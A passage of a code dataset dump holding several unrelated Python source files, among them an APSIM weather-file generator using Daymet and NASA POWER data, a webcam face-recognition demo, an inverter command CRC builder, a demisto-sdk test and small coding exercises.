MAX))\n else:\n best_v = min(best_v, dfs(arr[:i], MIN) + dfs(arr[i + 1:], MAX))\n else:\n if target == MAX:\n best_v = max(best_v, dfs(arr[:i], MAX) - dfs(arr[i + 1:], MIN))\n else:\n best_v = min(best_v, dfs(arr[:i], MIN) - dfs(arr[i + 1:], MIN))\n record[(arr, target)] = best_v\n return best_v\n\n return dfs(arr, MAX)\n\n\n# print(solution([\"1\", \"-\", \"3\", \"+\", \"5\", \"-\", \"8\"]))\n# print(solution([\"5\", \"-\", \"3\", \"+\", \"1\", \"+\", \"2\", \"-\", \"4\"]))\nprint(solution(\n [\"5\", \"-\", \"5\", \"+\", \"5\", \"-\", \"5\", \"-\", \"5\"]))\n","repo_name":"grasshopperTrainer/coding_practice","sub_path":"programmers/사칙연산 2.py","file_name":"사칙연산 2.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"24263067007","text":"from inspect import isfunction\nfrom typing import Type, Optional, get_type_hints, Callable, Any, Union\n\nfrom typing_extensions import Protocol, _get_protocol_attrs # type: ignore\n\n\nclass ReturnedUnionType(Exception):\n pass\n\n\ndef isimplementation(cls_: Optional[Type[Any]], proto: Type[Any]) -> bool:\n \"\"\"\n `isimplementation` checks to see if a provided class definition implement a provided Protocol definition.\n\n Parameters\n ----------\n cls_ : Any\n A concrete class defintiion\n proto : Any\n A protocol definition\n\n Returns\n -------\n bool\n Returns whether or not the provided class definition is a valid\n implementation of the provided Protocol.\n \"\"\"\n if cls_ is None:\n return False\n\n proto_annotations = get_type_hints(proto)\n cls_annotations = get_type_hints(cls_)\n\n for attr in _get_protocol_attrs(proto):\n try:\n proto_concrete = getattr(proto, attr)\n cls_concrete = getattr(cls_, attr)\n except AttributeError:\n proto_concrete = proto_annotations.get(attr)\n cls_concrete = cls_annotations.get(attr)\n\n if cls_concrete is None:\n return False\n\n if isfunction(proto_concrete):\n if not func_satisfies(cls_concrete, proto_concrete):\n return False\n\n continue\n\n if cls_concrete != proto_concrete:\n return False\n\n return True\n\n\ndef func_satisfies(impl: Callable[..., Any], proto: Callable[..., Any]) -> bool:\n proto_signature = get_type_hints(proto)\n\n try:\n impl_signature = get_type_hints(impl)\n except AttributeError:\n return False\n\n if issubclass(proto_signature.get(\"return\"), Protocol): # type: ignore\n proto_return: Type[Any] = proto_signature[\"return\"]\n cls_return: Optional[Type[Any]] = impl_signature.get(\"return\")\n if isimplementation(cls_return, proto_return):\n impl_signature[\"return\"] = proto_signature[\"return\"]\n\n for param, proto_type in proto_signature.items():\n try:\n impl_type = impl_signature[param]\n except KeyError:\n return False\n\n try:\n # Handle the case in which the Implementation\n # implements a satisfactory method with Union\n # types\n if impl_type.__origin__ is Union:\n if proto_type not in impl_type.__args__:\n return False\n\n if param == \"return\":\n raise ReturnedUnionType(\n f\"Returned Union type found in {impl} implementation of {proto}. \"\n + f\"Desired type {proto_type} is present in {impl_type} but jab cannot determine\"\n + f\"if the desired type will be returned from defined input.\"\n )\n\n continue\n except AttributeError:\n pass\n\n if proto_type != impl_type:\n return False\n\n return True\n","repo_name":"stntngo/jab","sub_path":"jab/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":2993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38095816346","text":"lista = list()\r\ntemp = list()\r\nmaior = menor = 0\r\n\r\nwhile True:\r\n temp.append(str(input('Digite o nome: ')))\r\n temp.append(float(input('Digite o peso: ')))\r\n\r\n if len(lista) == 0:\r\n maior = menor = temp[1]\r\n else:\r\n if maior < temp[1]:\r\n maior = temp[1]\r\n if menor > temp[1]:\r\n menor = temp[1]\r\n\r\n lista.append(temp[:])\r\n temp.clear()\r\n\r\n op = str(input('Deseja continuar? '))\r\n if op in 'Nn':\r\n break\r\n\r\nprint(f'Cadastros: {len(lista)}')\r\n\r\nprint(f'Maior peso: {maior} Kg. Peso de ', end=' ')\r\nfor p in lista:\r\n if p[1] == maior:\r\n print(f'{p[0]} ', end='')\r\n\r\nprint(f'Menor peso: {menor} Kg. Peso de ', end=' ')\r\nfor c in lista:\r\n if c[1] == menor:\r\n print(f'{c[0]} ', end=' ')\r\n","repo_name":"paulo-hst/python-curso-em-video","sub_path":"ex084.py","file_name":"ex084.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"32663208021","text":"import cv2\r\nimport face_recognition\r\n\r\n# Load the known faces and their names\r\nknown_face_names = [\"DR_YASIR_ARAFAT_MALKANI\", \"QUAID_E_AZAM\", \"BILL_GATES\",\"MS_NIRMA_ABRO\"]\r\nknown_face_images = [face_recognition.load_image_file(\"SIR_YASIR.jpg\"),\r\n face_recognition.load_image_file(\"QUAID_E_AZAM.jpg\"),\r\n face_recognition.load_image_file(\"BILL_GATES.jpg\")]\r\n #face_recognition.load_image_file(\"NIRMA_ABRO.jpeg\")] \r\n\r\n# Encode the known faces\r\nknown_face_encodings = [face_recognition.face_encodings(image)[0] for image in known_face_images]\r\n\r\nvideo_cap = cv2.VideoCapture(0)\r\n\r\nwhile True:\r\n ret, video_data = video_cap.read()\r\n col = cv2.cvtColor(video_data, cv2.COLOR_BGR2RGB)\r\n\r\n # Find all face locations and encodings in the current frame\r\n face_locations = face_recognition.face_locations(col)\r\n face_encodings = face_recognition.face_encodings(col, face_locations)\r\n\r\n for (top, right, bottom, left), face_encoding in zip(face_locations, face_encodings):\r\n # Compare the face encoding of the detected face with the known face encodings\r\n matches = face_recognition.compare_faces(known_face_encodings, face_encoding)\r\n name = \"Unknown\"\r\n\r\n # Check if any face matches with the known faces\r\n for i in range(len(matches)):\r\n if matches[i]:\r\n name = known_face_names[i]\r\n break\r\n\r\n # Draw a rectangle and display the name of the face\r\n cv2.rectangle(video_data, (left, top), (right, bottom), (0, 255, 0), 2)\r\n cv2.putText(video_data, name, (left, top - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 255, 0), 2)\r\n\r\n cv2.imshow(\"video_live\", video_data)\r\n\r\n if cv2.waitKey(10) == ord(\"z\"):\r\n break\r\n\r\nvideo_cap.release()\r\ncv2.destroyAllWindows()\r\n","repo_name":"NirmaAbro/Face_Recognition_System","sub_path":"Project.py","file_name":"Project.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72450596326","text":"\"\"\"Tbw.\"\"\"\nimport requests\nimport pandas as pd\nimport numpy as np\nimport json\nimport urllib\nimport io\nimport os\nfrom openpyxl import Workbook\nfrom openpyxl.styles import Alignment\nfrom openpyxl.utils.dataframe import dataframe_to_rows\n\nDAYMET_URL = \"https://daymet.ornl.gov/single-pixel/api/data\"\n\nnasa_params = r\"PRECTOTCORR,ALLSKY_SFC_SW_DWN,T2M_MIN,T2M_MAX,WS2M\"\n# PRECTOT = Precipitation (mm day-1)\n# ALLSKY_SFC_SW_DWN = Radiation in Mj per square meter\n# T2M_MIN = Mean daily min temp at 2 Meters (C)\n# T2M_MAX = Mean daily max temp at 2 Meters (C)\n# WS2M = Daily avg wind speed at 2m above earth surface\nNASA_URL = f\"https://power.larc.nasa.gov/api/temporal/daily/point?parameters={nasa_params}&community=SB&\"\n\n\nclass Weather:\n ###\n def from_dataframe(self, wth_df):\n # check keys\n keys = [\"year\", \"yday\", \"prcp\", \"srad\", \"swe\", \"tmax\", \"tmin\", \"vp\"]\n leap_years = [yr for yr in range(1980, 2020, 4)]\n for key in keys:\n if key not in wth_df.columns:\n print('Imported weather data missing key \"%\"'.format(key))\n\n wth_df = wth_df.drop(columns=[\"f1\"], axis=1)\n\n self.init_yr = wth_df[\"year\"].min()\n self.end_yr = wth_df[\"year\"].max()\n\n self.data = pd.DataFrame()\n self.data[\"year\"] = wth_df[\"year\"]\n self.data[\"day\"] = wth_df[\"yday\"]\n self.data[\"dayL\"] = wth_df[\"dayl\"] / 3600\n self.data[\"radn\"] = wth_df[\"srad\"] * wth_df[\"dayl\"] / 3600 * 0.0036\n self.data[\"maxt\"] = wth_df[\"tmax\"]\n self.data[\"mint\"] = wth_df[\"tmin\"]\n self.data[\"prcp\"] = wth_df[\"prcp\"]\n self.data[\"swe\"] = wth_df[\"swe\"]\n self.data[\"vp\"] = wth_df[\"vp\"] * 0.001\n self.data[\"rain\"] = 0.0\n self.data[\"snow\"] = 0.0\n\n # check for leap years\n for lp_yr in leap_years:\n lp_day = self.data.loc[\n (self.data[\"year\"] == lp_yr) & (self.data[\"day\"] == 365)\n ].copy(deep=True)\n lp_day[\"day\"] = 366\n lp_day[\"yday\"] = 366\n\n self.data = self.data.append(lp_day, ignore_index=True, sort=False)\n\n self.data = self.data.sort_values(by=[\"year\", \"day\"])\n\n # check is snow-water equivalent increases next day\n for idx, row in self.data.iterrows():\n if idx == 0:\n self.data.loc[idx:idx, \"snow\"] = 0.0\n self.data.loc[idx:idx, \"rain\"] = row[\"prcp\"]\n continue\n elif idx == len(self.data) - 1:\n self.data.loc[idx:idx, \"snow\"] = 0.0\n self.data.loc[idx:idx, \"rain\"] = row[\"prcp\"]\n continue\n else:\n cur = row[\"swe\"]\n next = self.data.iloc[idx + 1][\"swe\"]\n if next > cur:\n self.data.loc[idx:idx, \"snow\"] = row[\"prcp\"]\n self.data.loc[idx:idx, \"rain\"] = 0.0\n elif (next > 0.0) & (next == cur):\n self.data.loc[idx:idx, \"snow\"] = row[\"prcp\"]\n self.data.loc[idx:idx, \"rain\"] = 0.0\n else:\n self.data.loc[idx:idx, \"snow\"] = 0.0\n self.data.loc[idx:idx, \"rain\"] = row[\"prcp\"]\n\n self.data = self.data[\n [\n \"year\",\n \"day\",\n \"radn\",\n \"maxt\",\n \"mint\",\n \"rain\",\n \"snow\",\n \"vp\",\n \"dayL\",\n ]\n ]\n\n return self\n\n ###\n def from_daymet(self, lat, lon, startyr, endyr):\n ### Daymet variables and units\n # day length (s/day)\n # min_temp (C)\n # max_temp (C)\n # precip (mm)\n # radiation (W/m2)\n # snow-water equiv. (kg/m2)\n # vapor pressure (Pa)\n\n attributes = [\"dayl\", \"prcp\", \"srad\", \"swe\", \"tmax\", \"tmin\", \"vp\"]\n leap_years = [yr for yr in range(1980, 2020, 4)]\n year_arr = [str(startyr + i) for i in range(endyr - startyr + 1)]\n\n self.lat = lat\n self.lon = lon\n\n payload = {\n \"lat\": str(lat),\n \"lon\": str(lon),\n \"vars\": \",\".join(attributes),\n \"years\": \",\".join(year_arr),\n }\n req = requests.get(DAYMET_URL, params=payload)\n wth_df = pd.read_csv(io.StringIO(req.text), sep=\",\", header=6)\n\n # day of year\n wth_df[\"day\"] = wth_df[\"yday\"]\n\n # daylength (hours)\n wth_df[\"dayL\"] = round(wth_df[\"dayl (s)\"] / 3600, 1)\n\n # solar radiation (MJ/m2)\n wth_df[\"radn\"] = round(\n wth_df[\"srad (W/m^2)\"] * wth_df[\"dayl (s)\"] / 3600 * 0.0036, 1\n )\n\n # max temperature (deg C)\n wth_df[\"maxt\"] = round(wth_df[\"tmax (deg c)\"], 1)\n\n # min temperature (deg C)\n wth_df[\"mint\"] = round(wth_df[\"tmin (deg c)\"], 1)\n\n # vapor pressure (kPa)\n wth_df[\"vp\"] = round(wth_df[\"vp (Pa)\"] * 0.001, 1)\n\n # snow and rain (mm)\n wth_df[\"rain\"] = 0.0\n wth_df[\"snow\"] = 0.0\n\n # The Daymet calendar is based on a standard calendar year. All Daymet\n # years have 1 - 365 days, including leap years. For leap years, the Daymet\n # database includes leap day. Values for December 31 are discarded from\n # leap years to maintain a 365-day year.\n for lp_yr in leap_years:\n lp_day = wth_df.loc[\n (wth_df[\"year\"] == lp_yr) & (wth_df[\"day\"] == 365)\n ].copy(deep=True)\n lp_day[\"day\"] = 366\n lp_day[\"yday\"] = 366\n\n wth_df = wth_df.append(lp_day, ignore_index=True)\n\n wth_df = wth_df.sort_values(by=[\"year\", \"yday\"])\n\n # check if snow-water equivalent increases next day\n for idx, row in wth_df.iterrows():\n if idx == 0:\n wth_df.iloc[idx][\"snow\"] = 0.0\n wth_df.iloc[idx][\"rain\"] = row[\"prcp (mm/day)\"]\n continue\n elif idx == len(wth_df) - 1:\n wth_df.iloc[idx][\"snow\"] = 0.0\n wth_df.iloc[idx][\"rain\"] = row[\"prcp (mm/day)\"]\n continue\n else:\n cur = row[\"swe (kg/m^2)\"]\n next = wth_df.iloc[idx + 1][\"swe (kg/m^2)\"]\n if next > cur:\n wth_df.iloc[idx][\"snow\"] = row[\"prcp (mm/day)\"]\n wth_df.iloc[idx][\"rain\"] = 0.0\n elif (next > 0.0) & (next == cur):\n wth_df.iloc[idx][\"snow\"] = row[\"prcp (mm/day)\"]\n wth_df.iloc[idx][\"rain\"] = 0.0\n else:\n wth_df.iloc[idx][\"snow\"] = 0.0\n wth_df.iloc[idx][\"rain\"] = row[\"prcp (mm/day)\"]\n\n wth_df = wth_df[\n [\n \"year\",\n \"day\",\n \"radn\",\n \"maxt\",\n \"mint\",\n \"rain\",\n \"snow\",\n \"vp\",\n \"dayL\",\n ]\n ]\n\n self.data = wth_df\n\n return self\n\n def from_nasa_power(\n self, lat, lon, start_date=19900101, end_date=20201231, format=\"JSON\"\n ):\n self.lat = lat\n self.lon = lon\n # format = 'CSV' # JSON, CSV, ASCII, ICASA, NETCDF\n # request from API\n nasa_params = r\"PRECTOTCORR,ALLSKY_SFC_SW_DWN,T2M_MIN,T2M_MAX,WS2M\"\n full_url = f\"{NASA_URL}startDate={start_year}0101&endDate={end_year}1231&lat={lat}&lon={lon}&outputList={output}&userCommunity=SSE\"\n json_response = json.loads(\n requests.get(full_url).content.decode(\"utf-8\")\n )\n # Selects the file URL from the JSON response\n csv_request_url = json_response[\"outputs\"][output.lower()]\n # Download File to Folder\n output_folder = os.path.join(output_folder)\n # create folder if doesn't exist\n if not os.path.exists(output_folder):\n os.makedirs(output_folder)\n output_file_location = os.path.join(\n output_folder, os.path.basename(csv_request_url)\n )\n urllib.request.urlretrieve(csv_request_url, output_file_location)\n # read file and then delete\n met_df = pd.read_csv(output_file_location, header=14)\n # calculate daily mean temp\n met_df = met_df.drop([\"LAT\", \"LON\"], axis=1)\n met_df[\"meant\"] = round(\n ((met_df[\"T2M_MIN\"] + met_df[\"T2M_MAX\"]) / 2), 1\n )\n # add day of year as 'day' column in 1-365 format for apsim\n date_range = pd.date_range(f\"01-01-{start_year}\", f\"12-31-{end_year}\")\n doy = date_range.dayofyear\n met_df.insert(1, \"day\", doy)\n met_df = met_df.replace(-999, \"NA\")\n # remove original nasa power file and return dataframe\n os.remove(output_file_location)\n self.data = met_df\n return self\n\n def write_nasa_power_file(self, filepath, filename):\n # dump met file with Windows line endings\n if not os.path.exists(filepath):\n os.makedirs(filepath)\n full_path = os.path.join(filepath, filename)\n if self.lat == None:\n lat = \"\"\n lon = \"\"\n else:\n lat = self.lat\n lon = self.lon\n if filepath:\n headers = \" \".join(\n [\n \"year\",\n \"day\",\n \"month\",\n \"dom\",\n \"rain\",\n \"radn\",\n \"mint\",\n \"maxt\",\n \"windsp\",\n \"meant\",\n ]\n )\n units = \" \".join(\n [\n \"()\",\n \"()\",\n \"()\",\n \"()\",\n \"(mm)\",\n \"(Mj/m^2)\",\n \"(oC)\",\n \"(oC)\",\n \"(m/s)\",\n \"(oC)\",\n ]\n )\n with open(full_path, \"w\") as metfile:\n metfile.write(\"[weather.met.weather]\\r\\n\")\n metfile.write(\"station = Nasa Power weather\\r\\n\")\n metfile.write(\"latitude = {} (DECIMAL DEGREES)\\r\\n\".format(lat))\n metfile.write(\"longitude = {} (DECIMAL DEGREES)\\r\\n\".format(lon))\n metfile.write(\n \"tav = \" + str(round(np.mean(self.data[\"meant\"]), 1)) + \"\\r\\n\"\n )\n metfile.write(\n \"amp = \"\n + str(\n round(\n np.mean(\n self.data[\"T2M_MAX\"]\n - np.mean(self.data[\"T2M_MIN\"])\n ),\n 2,\n )\n )\n + \"\\r\\n\"\n )\n metfile.write(\n \"!Weather generated using ISU Foresite framework\\r\\n\"\n )\n metfile.write(headers + \"\\r\\n\")\n metfile.write(units + \"\\r\\n\")\n metfile.write(\n self.data.to_csv(\n sep=\" \", header=False, index=False, line_terminator=\"\\r\\n\"\n )\n )\n\n def write_nasa_excel_file(self, filepath, filename):\n if not os.path.exists(filepath):\n os.makedirs(filepath)\n full_path = os.path.join(filepath, filename)\n if self.lat == None:\n lat = \"\"\n lon = \"\"\n else:\n lat = self.lat\n lon = self.lon\n # greene_df.to_excel('greene.xlsx', index=False)\n wb = Workbook()\n ws = wb.active\n ws.alignment = Alignment(horizontal=\"left\")\n ws.append(\n [\n \"year\",\n \"day\",\n \"month\",\n \"dom\",\n \"rain\",\n \"radn\",\n \"mint\",\n \"maxt\",\n \"windsp\",\n \"meant\",\n ]\n )\n ws.append(\n [\n \"()\",\n \"()\",\n \"()\",\n \"()\",\n \"(mm)\",\n \"(MJ/m2)\",\n \"(oC)\",\n \"(oC)\",\n \"(m/s)\",\n \"(oC)\",\n ]\n )\n for r in dataframe_to_rows(self.data, index=False, header=False):\n ws.append(r)\n for cells in ws.iter_rows():\n for cell in cells:\n cell.alignment = Alignment(horizontal=\"left\")\n ws.insert_rows(1)\n ws[\"A1\"] = \"!Weather generated using C-CHANGE Foresite framework\"\n ws.insert_rows(1)\n ws[\"A1\"] = \"amp = \" + str(\n round(\n np.mean(self.data[\"T2M_MAX\"] - np.mean(self.data[\"T2M_MIN\"])),\n 2,\n )\n )\n ws.insert_rows(1)\n ws[\"A1\"] = \"tav = \" + str(round(np.mean(self.data[\"meant\"]), 2))\n ws.insert_rows(1)\n ws[\"A1\"] = f\"longitude = {lon} (DECIMAL DEGREES)\"\n ws.insert_rows(1)\n ws[\"A1\"] = f\"latitude = {lat} (DECIMAL DEGREES)\"\n ws.insert_rows(1)\n ws[\"A1\"] = \"station = NASA Power weather\"\n ws.insert_rows(1)\n ws[\"A1\"] = \"[weather.met.weather]\"\n full_path = os.path.join(f\"{full_path}.xlsx\")\n wb.save(full_path)\n\n ###\n def write_daymet_file(self, filepath):\n # dump met file with Windows line endings\n if self.lat == None:\n lat = \"\"\n lon = \"\"\n else:\n lat = self.lat\n lon = self.lon\n\n if filepath:\n headers = \" \".join(\n [\n \"year\",\n \"day\",\n \"radn\",\n \"maxt\",\n \"mint\",\n \"rain\",\n \"snow\",\n \"vp\",\n \"dayL\",\n ]\n )\n units = \" \".join(\n [\n \"()\",\n \"()\",\n \"(MJ/m^2)\",\n \"(oC)\",\n \"(oC)\",\n \"(mm)\",\n \"(mm)\",\n \"(kPa)\",\n \"(hours)\",\n ]\n )\n\n metfile = open(filepath, \"w\")\n metfile.write(\"[weather.met.weather]\\r\\n\")\n metfile.write(\"stateionname = Daymet weather\\r\\n\")\n metfile.write(\"latitude = {} (DECIMAL DEGREES)\\r\\n\".format(lat))\n metfile.write(\"longitude = {} (DECIMAL DEGREES)\\r\\n\".format(lon))\n metfile.write(\n \"tav = \" + str(round(self.data[\"maxt\"].mean(), 1)) + \"\\r\\n\"\n )\n metfile.write(\n \"amp = \" + str(round(self.data[\"maxt\"].max(), 1)) + \"\\r\\n\"\n )\n metfile.write(\n \"!Weather generated using ISU Foresite framework\\r\\n\"\n )\n metfile.write(headers + \"\\r\\n\")\n metfile.write(units + \"\\r\\n\")\n metfile.write(\n self.data.to_csv(\n sep=\" \", header=False, index=False, line_terminator=\"\\r\\n\"\n )\n )\n metfile.close()\n\n def add_daymet_spinup(self, lat, lon, init_yr, end_yr):\n self.lat = lat\n self.lon = lon\n self.init_yr = init_yr\n\n attributes = [\n \"weather_sample_id\",\n \"dayl\",\n \"prcp\",\n \"srad\",\n \"swe\",\n \"tmax\",\n \"tmin\",\n \"vp\",\n ]\n leap_years = [yr for yr in range(1980, 2020, 4)]\n\n # get spinup data from Daymet\n spup_start = init_yr\n spup_end = end_yr\n year_arr = [str(init_yr + i) for i in range(end_yr - init_yr + 1)]\n payload = {\n \"lat\": lat,\n \"lon\": lon,\n \"vars\": \",\".join(attributes),\n \"years\": \",\".join(year_arr),\n }\n req = requests.get(DAYMET_URL, params=payload)\n spinup_df = pd.read_csv(io.StringIO(req.text), sep=\",\", header=6)\n\n wth_df = pd.DataFrame()\n wth_df[\"year\"] = spinup_df[\"year\"]\n wth_df[\"day\"] = spinup_df[\"yday\"]\n wth_df[\"dayL\"] = spinup_df[\"dayl (s)\"] / 3600\n wth_df[\"radn\"] = (\n spinup_df[\"srad (W/m^2)\"] * spinup_df[\"dayl (s)\"] / 3600 * 0.0036\n )\n wth_df[\"maxt\"] = spinup_df[\"tmax (deg c)\"]\n wth_df[\"mint\"] = spinup_df[\"tmin (deg c)\"]\n wth_df[\"prcp\"] = spinup_df[\"prcp (mm/day)\"]\n wth_df[\"swe\"] = spinup_df[\"swe (kg/m^2)\"]\n wth_df[\"vp\"] = spinup_df[\"vp (Pa)\"] * 0.001\n wth_df[\"rain\"] = 0.0\n wth_df[\"snow\"] = 0.0\n\n # check for leap years\n for lp_yr in leap_years:\n lp_day = wth_df.loc[\n (wth_df[\"year\"] == lp_yr) & (wth_df[\"day\"] == 365)\n ].copy(deep=True)\n lp_day[\"day\"] = 366\n lp_day[\"yday\"] = 366\n\n wth_df = wth_df.append(lp_day, ignore_index=True, sort=False)\n\n wth_df = wth_df.sort_values(by=[\"year\", \"day\"])\n\n # check is snow-water equivalent increases next day\n for idx, row in wth_df.iterrows():\n if idx == 0:\n wth_df.loc[idx:idx, \"snow\"] = 0.0\n wth_df.loc[idx:idx, \"rain\"] = row[\"prcp\"]\n continue\n elif idx == len(wth_df) - 1:\n wth_df.loc[idx:idx, \"snow\"] = 0.0\n wth_df.loc[idx:idx, \"rain\"] = row[\"prcp\"]\n continue\n else:\n cur = row[\"swe\"]\n next = wth_df.iloc[idx + 1][\"swe\"]\n if next > cur:\n wth_df.loc[idx:idx, \"snow\"] = row[\"prcp\"]\n wth_df.loc[idx:idx, \"rain\"] = 0.0\n elif (next > 0.0) & (next == cur):\n wth_df.loc[idx:idx, \"snow\"] = row[\"prcp\"]\n wth_df.loc[idx:idx, \"rain\"] = 0.0\n else:\n wth_df.loc[idx:idx, \"snow\"] = 0.0\n wth_df.loc[idx:idx, \"rain\"] = row[\"prcp\"]\n\n wth_df = wth_df[\n [\n \"year\",\n \"day\",\n \"radn\",\n \"maxt\",\n \"mint\",\n \"rain\",\n \"snow\",\n \"vp\",\n \"dayL\",\n ]\n ]\n\n self.data = wth_df.append(self.data, sort=False)\n self.data = self.data.round(2)\n\n\ndef create_excel_met(\n lat, long, start_year, end_year, met_name, tar_folder=\"apsim_files/met\"\n):\n \"\"\"Creates Daymet met file as an Excel spreadsheet.\n\n Args:\n lat (int): Latitude of single pixel to extract weather data for.\n long (int): Longitude of single pixel to extract weather data for.\n start_year (int): Starting year of met data to get.\n end_year (int): Ending year of met data to get.\n met_name (str): Name of met file to write.\n tar_folder (str, optional): Target folder to write met file to. Defaults to 'apsim_files/met'.\n \"\"\"\n if not os.path.exists(tar_folder):\n os.makedirs(tar_folder)\n wth_obj = Weather().from_daymet(lat, long, start_year, end_year)\n wth_df = wth_obj.data\n tav = round(wth_df[\"maxt\"].mean(), 1)\n amp = round(wth_df[\"maxt\"].max(), 1)\n # greene_df.to_excel('greene.xlsx', index=False)\n wb = Workbook()\n ws = wb.active\n ws.alignment = Alignment(horizontal=\"left\")\n for r in dataframe_to_rows(wth_df, index=False, header=True):\n ws.append(r)\n for cells in ws.iter_rows():\n for cell in cells:\n cell.alignment = Alignment(horizontal=\"left\")\n ws.insert_rows(2)\n ws[\"A2\"] = \"()\"\n ws[\"B2\"] = \"()\"\n ws[\"C2\"] = \"(MJ/m2)\"\n ws[\"D2\"] = \"(oC)\"\n ws[\"E2\"] = \"(oC)\"\n ws[\"F2\"] = \"(mm)\"\n ws[\"G2\"] = \"(mm)\"\n ws[\"H2\"] = \"(kPa)\"\n ws[\"I2\"] = \"(hours)\"\n ws.insert_rows(1)\n ws[\"A1\"] = \"!Weather generated using C-CHANGE Foresite framework\"\n ws.insert_rows(1)\n ws[\"A1\"] = f\"amp = {amp}\"\n ws.insert_rows(1)\n ws[\"A1\"] = f\"tav = {tav}\"\n ws.insert_rows(1)\n ws[\"A1\"] = f\"longitude = {long} (DECIMAL DEGREES)\"\n ws.insert_rows(1)\n ws[\"A1\"] = f\"latitude = {lat} (DECIMAL DEGREES)\"\n ws.insert_rows(1)\n ws[\"A1\"] = \"stationname = Daymet weather\"\n ws.insert_rows(1)\n ws[\"A1\"] = \"[weather.met.weather]\"\n full_path = os.path.join(tar_folder, f\"{met_name}.xlsx\")\n wb.save(full_path)\n\n\n\"\"\"\nGet the weather for given centroid and write to a .met file\n\nArgs:\n lat {float} -- latitude of centroid\n long {float} -- longitude of centroid\n year_star {int} -- starting year of weather data\n year_end {int} -- ending year of weather data\n path {str} -- path to write the met files\n filename {str} -- name to give the .met file\n\nReturns:\n None\n\"\"\"\n\n\ndef create_met(\n lat, long, start_year, end_year, filename, path=\"apsim_files/met_files\"\n):\n weather_obj = Weather().from_daymet(lat, long, start_year, end_year)\n weather_obj.write_met_file(f\"{path}/{filename}.met\")\n","repo_name":"isuforesite/Foresite","sub_path":"src/foresite/apsim/weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":20851,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"16473620558","text":"import crc16\n\n\nclass Command:\n def __init__(self, command):\n self.command = command\n self.hex_command = []\n self.command_split = [char for char in command]\n self.command_encoded = command.encode()\n self.crc_string = hex(crc16.crc16xmodem(self.command_encoded))\n self.crc_int = int(self.crc_string, 16)\n self.crc_high, self.crc_low = divmod(self.crc_int, 0x100)\n\n def convert_tohex(self):\n hex_list = []\n for char in self.command_split:\n char = ord(char)\n hex_list.append(char)\n self.hex_command.append(char)\n return hex_list\n\n def append_crc(self):\n self.hex_command.append(self.crc_high)\n self.hex_command.append(self.crc_low)\n\n def append_delim(self):\n self.hex_command.append(13)\n\n def build_command(self):\n self.convert_tohex()\n self.append_crc()\n self.append_delim()\n","repo_name":"KyleBotha/axpert-command-library","sub_path":"AxpertPy/CalculateCommands.py","file_name":"CalculateCommands.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21452455391","text":"from typing import Dict\n\nimport pytest\n\nfrom demisto_sdk.commands.common.content.objects.pack_objects.pack import Pack\nfrom demisto_sdk.commands.convert.converters.layout.layout_base_converter import (\n LayoutBaseConverter,\n)\n\n\nclass TestLayoutBaseConverter:\n CREATE_LAYOUT_DICT_INPUTS = [\n (dict(), {\"version\": -1}),\n (\n {\n \"from_version\": \"4.1.0\",\n \"to_version\": \"5.9.9\",\n \"kind\": \"quickView\",\n \"type_id\": \"ExtraHop Incident\",\n },\n {\n \"fromVersion\": \"4.1.0\",\n \"toVersion\": \"5.9.9\",\n \"version\": -1,\n \"kind\": \"quickView\",\n \"typeId\": \"ExtraHop Incident\",\n },\n ),\n (\n {\"from_version\": \"6.0.0\", \"layout_id\": \"ExtraHop Incident\"},\n {\n \"fromVersion\": \"6.0.0\",\n \"name\": \"ExtraHop Incident\",\n \"id\": \"ExtraHop Incident\",\n \"version\": -1,\n },\n ),\n ]\n\n @pytest.mark.parametrize(\"inputs, expected\", CREATE_LAYOUT_DICT_INPUTS)\n def test_create_layout_dict(self, inputs: Dict, expected: Dict):\n \"\"\"\n Given:\n - List of fields of layouts with their values.\n\n When:\n - Creating a new dict representing a layout file.\n\n Then:\n - Ensure the expected dict is created.\n \"\"\"\n assert LayoutBaseConverter.create_layout_dict(**inputs) == expected\n\n def test_get_layout_dynamic_fields(self, tmpdir):\n \"\"\"\n Given:\n - Schema path of the layouts-container.\n\n When:\n - Wanting to retrieve all dynamic fields in the schema.\n\n Then:\n - Ensure dynamic fields are returned.\n \"\"\"\n dynamic_fields = set(\n LayoutBaseConverter(Pack(tmpdir)).get_layout_dynamic_fields().keys()\n )\n assert dynamic_fields == {\n \"close\",\n \"details\",\n \"detailsV2\",\n \"edit\",\n \"indicatorsDetails\",\n \"indicatorsQuickView\",\n \"mobile\",\n \"quickView\",\n }\n","repo_name":"demisto/demisto-sdk","sub_path":"demisto_sdk/commands/convert/converters/layout/tests/layout_base_converter_test.py","file_name":"layout_base_converter_test.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"52"} +{"seq_id":"39512881355","text":"'''\n编写一种方法,对字符串数组进行排序,将所有变位词组合在一起。变位词是指字母相同,但排列不同的字符串。\n\n注意:本题相对原题稍作修改\n\n示例:\n\n输入: [\"eat\", \"tea\", \"tan\", \"ate\", \"nat\", \"bat\"],\n输出:\n[\n [\"ate\",\"eat\",\"tea\"],\n [\"nat\",\"tan\"],\n [\"bat\"]\n]\n说明:\n\n所有输入均为小写字母。\n不考虑答案输出的顺序。\n'''\n\nclass Solution(object):\n def groupAnagrams(self, strs):\n \"\"\"\n :type strs: List[str]\n :rtype: List[List[str]]\n \"\"\"\n position = {}\n result = []\n count = 0\n for term in strs:\n sorted_term = \"\".join(sorted(term))\n if sorted_term not in position.keys():\n result.append([term])\n position[sorted_term] = count\n count += 1\n else:\n result[position[sorted_term]].append(term)\n return result","repo_name":"oscarhscc/algorithm-with-python","sub_path":"程序员面试经典/面试题 10.02. 变位词组.py","file_name":"面试题 10.02. 